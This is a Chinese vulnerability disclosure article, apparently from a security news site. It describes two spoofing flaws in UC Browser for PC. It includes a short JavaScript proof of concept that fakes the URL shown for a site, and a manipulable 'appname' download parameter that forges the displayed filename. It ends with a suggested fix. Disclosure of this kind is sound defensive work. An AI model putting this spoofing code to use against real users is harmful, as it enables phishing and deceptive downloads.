频道栏目
首页 > 资讯 > 系统安全 > 正文

UC浏览器(PC版)任意网站伪造漏洞

14-09-20        来源:[db:作者]  
收藏   我要投稿

UC浏览器任意网站伪造漏洞(打包)

浏览器版本

 

2.png





#1.任意网站伪造

POC:
 

<script>

function spoof()

{

document.write("<title>Baidu</title>");

document.write("<h1>I'm Fake One</h1><marquee>反正什么代码都可以</marquee><iframe src=http://www.baidu.com></iframe>");

window.location.assign("http://www.baidu.com:8100");

}

setInterval(spoof(),2000);

</script>



运行POC以后会出错,但是UC浏览器很贴心的帮我们恢复了,结果就可以任意网站伪造了。
 

1.png







#2.软件下载欺骗

在用PC班UC浏览器装暴走漫画的应用时GET请求如下:
 

http://down1.apps.uc.cn/group1/M00/B3/75/Cg2DP1OekvLT4GzOALNinX2P17I905.apk?attname=com.baozoumanhua.android_6.1.3_64.apk&appname=暴走漫画.apk



appname=可控,可以任意伪造,没有确认,直接输出在了浏览器的下载框内。所以我们可以伪造暴走漫画的apk为十张内涵图,如下:
 

3.png



当然其实下载下来的是暴走漫画啦

~!1.
 

1.png





~!2.
 

3.png

 

修复方案:

对于第二个,appname参数应该设置成用户不可控的,为什么要画蛇添足的设置一个appname参数呢?

相关TAG标签
上一篇:金山某游戏仓库密码绕过(直接修改关键数据)
下一篇:走秀网利用XSS+STRUCT2任意执行命令
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站